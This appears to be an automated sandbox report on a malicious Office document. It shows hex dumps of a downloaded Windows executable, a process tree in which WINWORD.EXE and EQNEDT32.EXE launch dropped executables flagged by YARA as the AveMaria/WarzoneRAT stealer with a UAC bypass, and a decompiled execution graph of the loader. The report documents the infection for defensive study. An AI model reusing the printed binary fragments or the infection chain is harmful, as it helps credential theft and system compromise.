                                    2023-01-13 18:11:11 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELOah*
                                    2023-01-13 18:11:11 UTC16INData Raw: 75 fc ff 75 08 e8 9a 00 00 00 68 00 7f 00 00 53 ff d7 50 ff 15 f0 81 40 00 8b 7d 14 81 7f 08 00 07 00 00 75 48 81 7f 0c 00 01 00 00 75 3f 83 7f 10 0d 75 10 53 6a 01 68 11 01 00 00 ff 35 68 a2 42 00 ff d6 83 7f 10 1b 75 0c 53 53 6a 10 ff 35 68 a2 42 00 ff d6 33 c0 40 eb 1e 81 7d 0c 0b 04 00 00 75 06 ff 05 14 17 42 00 8b 7d 14 57 ff 75 10 ff 75 0c e8 24 fc ff ff 5f 5e 5b c9 c2 10 00 83 3d ec a2 42 00 00 a1 10 17 42 00 75 05 a1 44 37 42 00 6a 01 6a 01 68 f4 00 00 00 50 ff 15 80 82 40 00 c3 55 8b ec 83 ec 3c 8b 45 08 83 65 d8 00 83 65 dc 00 89 45 cc 8b 45 0c c7 45 c8 00 05 00 00 89 45 d4 8d 45 c4 50 c7 45 e0 01 00 00 00 c7 45 d0 c8 a3 40 00 e8 24 12 00 00 c9 c2 0c 00 55 8b ec 81 7d 0c 10 01 00 00 56 8b 75 14 75 26 ff 76 30 6a 1d ff 75 08 e8 39 fb ff ff 8b 46
                                    Data Ascii: uuhSP@}uHu?uSjh5hBuSSj5hB3@}uB}Wuu$_^[=BBuD7BjjhP@U<EeeEEEEEPEE@$U}Vuu&v0ju9F
                                    2023-01-13 18:11:11 UTC32INData Raw: 69 74 50 72 6f 63 65 73 73 00 46 00 43 6f 70 79 46 69 6c 65 57 00 14 03 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 f4 01 47 65 74 57 69 6e 64 6f 77 73 44 69 72 65 63 74 6f 72 79 57 00 00 d6 01 47 65 74 54 65 6d 70 50 61 74 68 57 00 00 11 01 47 65 74 43 6f 6d 6d 61 6e 64 4c 69 6e 65 57 00 ea 01 47 65 74 56 65 72 73 69 6f 6e 45 78 57 00 15 03 53 65 74 45 72 72 6f 72 4d 6f 64 65 00 00 cd 03 6c 73 74 72 6c 65 6e 57 00 00 ca 03 6c 73 74 72 63 70 79 6e 57 00 94 03 57 69 64 65 43 68 61 72 54 6f 4d 75 6c 74 69 42 79 74 65 00 50 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 57 00 0a 02 47 6c 6f 62 61 6c 55 6e 6c 6f 63 6b 00 00 03 02 47 6c 6f 62 61 6c 4c 6f 63 6b 00 00 6f 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 71 01 47 65 74
                                    Data Ascii: itProcessFCopyFileWSetEnvironmentVariableWGetWindowsDirectoryWGetTempPathWGetCommandLineWGetVersionExWSetErrorModelstrlenWlstrcpynWWideCharToMultiBytePGetDiskFreeSpaceWGlobalUnlockGlobalLockoCreateThreadqGet
                                    2023-01-13 18:11:11 UTC48INData Raw: 92 46 9c 26 ae 52 a4 9b a3 55 d3 e1 8b f7 af 66 d8 73 f6 72 c2 a9 c0 b3 ad b2 46 a5 83 a7 32 6a 4f 23 a7 c4 58 1f eb 6c d2 59 08 94 0c d6 b6 85 92 d0 aa cf 63 3e 37 92 82 56 67 12 a3 ab 89 3e a4 07 1f a9 db 3d 6e d8 f9 cd 44 ba 47 79 ff f0 be 0d da e2 5c 17 23 0d d7 26 ca eb 8e f9 31 d3 40 45 25 25 02 2e 5c f6 7d e4 d1 c8 e2 29 7e 80 e9 b3 94 8a 17 ac d6 ae c1 55 cd 7f 65 bb c4 2d 15 36 3f 4c ba 95 42 cb d5 9f 8c a1 1d 12 7b 24 9f 8b f6 6b 36 c7 e3 f1 26 f6 4b 11 6a 5c 30 77 65 81 c4 5c 0f 65 d1 d6 28 a9 f4 dd a6 fc c6 c0 e0 e9 0a bb 8c 76 b2 6f cb 89 ce d5 ed 4b 61 57 6e 08 43 e4 02 7d 62 08 8e 4a c1 19 72 32 27 51 37 c8 15 6e 2c 4e 43 b9 be 40 b3 dc f0 67 fd b2 99 eb 2a 1d 43 55 74 41 00 fd 5f 91 30 db a7 f2 2c e7 7e 02 45 f4 00 21 c9 28 de ae 1a e6 50
                                    Data Ascii: F&RUfsrF2jO#XlYc>7Vg>=nDGy\#&1@E%%.\})~Ue-6?LB{$k6&Kj\0we\e(voKaWnC}bJr2'Q7n,NC@g*CUtA_0,~E!(P
                                    2023-01-13 18:11:11 UTC64INData Raw: 25 46 a9 e2 11 ce bd 3e 8e b2 65 28 7c a7 a1 21 72 d1 5e 2a 7d c3 c0 39 b6 47 a4 0c cd a9 78 73 a6 aa e5 48 c1 06 cc 2b ff ce 20 d4 3c 02 e8 01 fd f5 22 2f c3 65 be 60 ae 13 29 63 3d 54 53 c1 dd 90 68 e6 57 94 14 f8 96 ba 41 8f 5d 4d 84 40 4f 00 79 06 69 a3 c6 71 32 f9 36 eb 61 4b 30 ea f2 cb c5 fe c5 99 e9 31 25 06 eb e1 5a 6f d3 14 c6 58 80 e9 eb 30 0b cc 48 9a 80 16 cd 29 15 19 d8 05 13 dd 59 b0 36 01 a8 76 f9 72 6a 81 cd 21 8b 0b 56 e9 34 e0 ca 22 de 72 ee ec 0d 75 74 c9 e7 75 47 58 47 fb 27 10 4b d2 20 d5 91 f8 05 66 30 58 32 01 e6 ef 1d 66 88 0e e6 a6 85 17 2e 09 a7 9d 3f ed c8 6c 06 e3 77 e6 a7 e5 86 7d ff 02 6a 9c 4f 3c d7 ef ee 94 19 a0 96 03 97 27 c6 dc 0a 24 3e 72 49 b1 a5 fd 16 1f 9c bf f2 de af 6c be d8 e7 eb a8 20 f4 6b 79 18 fd 64 81 53 ba
                                    Data Ascii: %F>e(|!r^*}9GxsH+ <"/e`)c=TShWA]M@Oyiq26aK01%ZoX0H)Y6vrj!V4"rutuGXG'K f0X2f.?lw}jO<'$>rIl kydS
                                    2023-01-13 18:11:11 UTC80INData Raw: 9a 9f 0a c7 86 97 e6 7f 61 0a 75 0c d1 5e 7c 4c 3e 3c 4d ec 54 68 92 79 7b ad 3b 23 cc b9 4e f8 fc 78 29 0d 8b 75 d4 14 69 d5 2d 67 2c dc 90 e6 11 c3 fe f6 1a 00 d2 63 c0 5d 89 8f e8 87 98 b4 04 d2 3b 6b 00 34 07 ed 7e dd b9 91 82 b8 8e 95 f8 99 33 8b 4e 51 ff 6b 70 3d 3a 35 d9 b5 d9 ae b1 a9 7f dd ac 7f 04 a1 9e 99 f3 db 86 b1 8c c8 1e 5b ec 82 7c 33 8d d0 44 fa 3a 7d e7 0e 66 ea 11 96 c0 d4 89 08 2d d7 f4 d5 d9 b3 46 8d 5c f7 89 e3 5a 9e 91 6d a5 20 34 5f 00 22 1f b4 a5 b4 a3 00 a1 e0 6f 7b f6 f8 5b dc b8 23 5a 6b db 23 97 bb 85 71 86 28 67 51 29 d2 81 93 35 0d 67 ba 2c e2 97 2c 47 59 ce ca 93 84 1d 86 d1 9d af 45 7a 0e a5 57 84 56 51 e5 6a 7c cf c4 49 a5 1a 00 ed f8 1e e8 a6 65 24 26 d7 bd 45 bf 9e 4c 20 8f 56 31 6e d4 6d 20 17 41 48 4e d4 42 44 d2 ee
                                    Data Ascii: au^|L><MThy{;#Nx)ui-g,c];k4~3NQkp=:5[|3D:}f-F\Zm 4_"o{[#Zk#q(gQ)5g,,GYEzWVQj|Ie$&EL V1nm AHNBD
                                    2023-01-13 18:11:11 UTC96INData Raw: 19 4a ec 12 b0 76 fe 25 c7 31 a1 8e c7 98 c3 08 1e d5 32 11 ad fd dd 27 e6 b6 f6 33 f8 e6 07 c3 42 0c 2a 5a e8 b1 1b 8d 46 2b 83 b1 9e d8 d1 48 0b 96 85 c2 7b 8e ff 20 50 b0 4c 11 2f 2b c5 7b dd 9c b6 1d d7 14 33 52 29 40 15 2c ae f4 af 9b 00 d0 c0 64 67 21 3f 93 15 b4 a2 95 0a 6e 41 9d 8e c7 18 51 93 6c 70 1c ba 25 09 d0 01 8d 08 d9 98 ad ce 58 97 8e f7 a5 1f 5d 8e 10 06 09 2d 41 33 00 cf e0 10 05 f3 06 cb 31 46 d7 c0 a5 76 8d 83 91 78 d0 b0 52 27 3c 7f 93 20 ea e5 ff c7 32 aa 04 53 e6 2d 6f f4 d9 c5 11 6d 2f b3 9e b9 09 e5 58 1a 91 2c 46 ef 47 24 04 70 f4 3e 67 06 6a 19 c0 ee e8 32 cc 0a e1 35 3d e3 b3 cb 9c 20 cb 3f ce 4b ff 28 59 1e 8b 43 91 8a 0e c9 47 29 0f 66 21 36 0c dc 65 35 da 04 74 8b ec c6 55 0e ee 40 ca e3 1a 2e 15 1a a2 f0 2b 5e 8e 7e 3b 2a
                                    Data Ascii: Jv%12'3B*ZF+H{ PL/+{3R)@,dg!?nAQlp%X]-A31FvxR'< 2S-om/X,FG$p>gj25= ?K(YCG)f!6e5tU@.+^~;*
                                    2023-01-13 18:11:11 UTC112INData Raw: 3e 5a 6d 80 c5 b7 60 fb 19 3e 9e 93 b9 f0 9d 95 17 d5 d5 2f b3 63 d8 af 66 be 6d 5d cf 69 0d 3d bb 96 d9 a7 b4 80 69 25 7c 29 ac 19 00 6c 0b 10 df 80 22 d9 65 4c b7 ef d7 f5 a2 85 45 67 91 46 4e d0 3b fb da 74 19 a9 86 20 cd fc ba 4b 59 c6 7c 22 5d 69 60 fd 7d 8d d6 89 ac 34 d6 87 9e eb 97 52 4f bd 8b 54 d6 bd 6d ec d4 49 e7 03 28 90 86 53 c2 f0 79 ff f0 89 b3 09 91 d5 22 f6 16 b9 99 40 57 70 e2 44 1c cb b0 89 3f 21 05 4f 4b 4b b6 06 38 c1 d4 80 37 d0 f9 20 b8 72 cd fa 30 8e b9 4a c7 f7 fd e7 29 b0 e2 3f 32 a6 a1 f8 e5 b2 91 22 14 4b b3 7e 0e 6d 28 91 05 ac 26 c2 54 be d3 ee ea 83 85 1d 5e 9d ad f0 bd 30 77 ea 97 62 ae 77 07 e5 87 21 32 15 56 10 29 c4 c2 5b 53 89 89 e7 0c 98 04 00 82 c7 ee 02 7b 22 63 68 dd 19 9d c2 0b 71 0b 78 23 cf 3d 03 3b 50 33 08 bc
                                    Data Ascii: >Zm`>/cfm]i=i%|)l"eLEgFN;t KY|"]i`}4ROTmI(Sy"@WpD?!OKK87 r0J)?2"K~m(&T^0wbw!2V)[S{"chqx#=;P3
                                    2023-01-13 18:11:11 UTC128INData Raw: 46 06 4c 4a e7 3c c7 fc e7 0d 93 41 a8 67 1a 17 84 2d 45 32 cb 9b 4b e8 2d 29 fc 3a 7f 9b b5 6d 3e 53 61 99 33 8f 5f e0 aa e1 ba 1a 69 f5 1e 5e c4 01 86 15 92 fa 92 64 25 9c 32 38 20 74 2a 85 d0 6f 8a 46 9f 13 4c 3e 19 cd c0 52 26 03 fe 9e a7 71 7e 01 2a 5c b2 8b e0 4f e8 be 7a f7 32 1e 2b 21 e1 e7 7c 5b 22 06 ab e4 94 61 6d 9c 7c 01 0d 72 2c da d1 7d 69 9b 04 1a 5f 3e 67 27 74 59 a3 15 a2 a9 3d 31 c4 27 de 36 a9 96 0a 9f 18 39 c6 ad 06 6e af 53 fa 36 d0 cf 38 b5 40 61 10 a8 22 4f 58 ed 6d e4 52 27 bd aa b1 c5 50 e9 08 09 03 dc 47 e0 c8 81 7d 92 51 8f f3 0b 96 6f 76 1b 15 af 1a fd 0d ad 90 80 1e 2a 1b 55 ed 97 09 b7 07 70 63 c0 ca 31 71 f9 b6 72 d7 d2 a7 50 37 6f 8b f8 8b b6 fc 34 9d 13 68 94 8e be 62 58 ec ad f7 82 43 ae a6 4a 10 20 54 df df 70 df c9 b3
                                    Data Ascii: FLJ<Ag-E2K-):m>Sa3_i^d%28 t*oFL>R&q~*\Oz2+!|["am|r,}i_>g'tY=1'69nS68@a"OXmR'PG}Qov*Upc1qrP7o4hbXCJ Tp
                                    2023-01-13 18:11:12 UTC144INData Raw: d1 49 84 25 32 52 c8 5a 2c 41 c9 6a 89 50 09 14 b1 6d cd bc 93 06 4f 25 28 cf 2a ae 0d 01 20 3d bf 91 d0 32 55 f3 13 af 12 8e 64 4f 5a f5 9f c5 f2 fe 41 2d 15 1c 4d 73 8c bf 19 84 bb 54 1e 0e c3 c2 3d c2 23 89 62 23 90 c9 7c 7d 96 ff e1 c7 e1 81 57 96 e2 b5 74 9a 7c 00 4d d2 dd 9e e9 07 c1 b0 65 eb 6e c7 23 e5 4f 52 95 ac 6b e6 93 42 cc 0f 47 f0 50 8f 1f 0d d9 49 c2 ef 36 e2 9f 68 a9 e8 86 7c db 09 93 72 35 25 2f 87 63 29 c1 0e 8e 9d 2c 86 fb e2 3b 13 23 14 26 22 89 b1 62 32 f9 5e 66 0b e2 c9 7c 35 18 41 8a 01 20 07 02 7f 16 c5 4e ba d9 87 cd 86 42 6e 56 9e 60 cc 17 08 86 a2 1a e2 dc d7 8f 2d af b9 4c aa dc da da a4 e5 81 ca 05 42 57 9e f7 da 0b c1 b4 82 6d 52 cf b6 45 5b c7 1a af 3e a2 f2 d2 e3 e0 85 58 01 79 78 ba eb 2f d1 25 4e a5 51 c8 60 c3 49 76 50
                                    Data Ascii: I%2RZ,AjPmO%(* =2UdOZA-MsT=#b#|}Wt|Men#ORkBGPI6h|r5%/c),;#&"b2^f|5A NBnV`-LBWmRE[>Xyx/%NQ`IvP
                                    2023-01-13 18:11:12 UTC160INData Raw: 76 75 84 df f5 23 c4 f4 5c 18 89 c8 3a 5d 8b d4 be 58 9c 64 0f 3b 5c d7 7c 99 64 df 26 e7 ab 7e 46 ba 39 32 2f c3 4d 8f 17 cb 79 32 c2 9a 31 70 aa c0 3b 3d 1d f6 cf 9d 69 a9 68 15 27 07 c4 d1 f9 ec 11 bc 64 a4 a5 1a c1 48 68 e5 04 24 4a bc ff b2 96 5b e5 38 12 d5 dc b8 1f 8c 64 2d 14 45 0e a5 8c ee 18 49 69 8e 42 26 57 b2 69 0f 1f de e0 75 ed d5 15 98 94 69 93 d0 7b 6e c7 38 ab 20 a8 4f 72 13 e6 b7 1c 3e 28 e6 af c3 f9 45 a8 36 1c 9c 54 56 39 0e 3f e7 9b b2 50 a1 60 14 6e c1 06 2a fa 81 5a 35 30 12 9d 6d 1a 9b fd d2 7f ca 18 a3 57 3d 40 77 68 1b 71 a1 d9 2f 1d ab 86 0d 45 ef 5e 08 8f 92 82 69 53 6e f7 2e f6 f8 6d 7c 98 b0 30 a4 3a 06 0f e0 1a 46 6a a0 2f a1 7b 4e 80 8a 84 06 32 fa 36 2a a7 d1 fc 89 b1 9d 9c 0c 1a 73 c0 1e 65 82 64 92 72 c9 3b 55 e8 96 e1
                                    Data Ascii: vu#\:]Xd;\|d&~F92/My21p;=ih'dHh$J[8d-EIiB&Wiui{n8 Or>(E6TV9?P`n*Z50mW=@whq/E^iSn.m|0:Fj/{N26*sedr;U


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:19:10:16
                                    Start date:13/01/2023
                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                    Imagebase:0x13f320000
                                    File size:1423704 bytes
                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:2
                                    Start time:19:10:18
                                    Start date:13/01/2023
                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                    Imagebase:0x400000
                                    File size:543304 bytes
                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:5
                                    Start time:19:10:23
                                    Start date:13/01/2023
                                    Path:C:\Users\user\AppData\Roaming\word.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\word.exe
                                    Imagebase:0x400000
                                    File size:176267 bytes
                                    MD5 hash:80158B31173F6E2BC97D5AD1FA9E365F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low

                                    Target ID:6
                                    Start time:19:10:23
                                    Start date:13/01/2023
                                    Path:C:\Users\user\AppData\Local\Temp\efwhixxln.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl
                                    Imagebase:0x400000
                                    File size:49152 bytes
                                    MD5 hash:5E067A5FD52C68F0AB1AA8BB9928037D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: AveMaria_WarZone, Description: unknown, Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low

                                    Target ID:7
                                    Start time:19:10:25
                                    Start date:13/01/2023
                                    Path:C:\Users\user\AppData\Local\Temp\efwhixxln.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\efwhixxln.exe
                                    Imagebase:0x400000
                                    File size:49152 bytes
                                    MD5 hash:5E067A5FD52C68F0AB1AA8BB9928037D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: AveMaria_WarZone, Description: unknown, Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000007.00000003.923433855.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000007.00000003.923433855.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    Target ID:8
                                    Start time:19:10:35
                                    Start date:13/01/2023
                                    Path:C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe" "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD
                                    Imagebase:0x400000
                                    File size:49152 bytes
                                    MD5 hash:5E067A5FD52C68F0AB1AA8BB9928037D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Target ID:11
                                    Start time:19:10:48
                                    Start date:13/01/2023
                                    Path:C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe" "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD
                                    Imagebase:0x400000
                                    File size:49152 bytes
                                    MD5 hash:5E067A5FD52C68F0AB1AA8BB9928037D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Target ID:13
                                    Start time:19:10:57
                                    Start date:13/01/2023
                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                    Imagebase:0x400000
                                    File size:543304 bytes
                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:15.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:16.4%
                                      Total number of Nodes:1385
                                      Total number of Limit Nodes:25
                                      execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 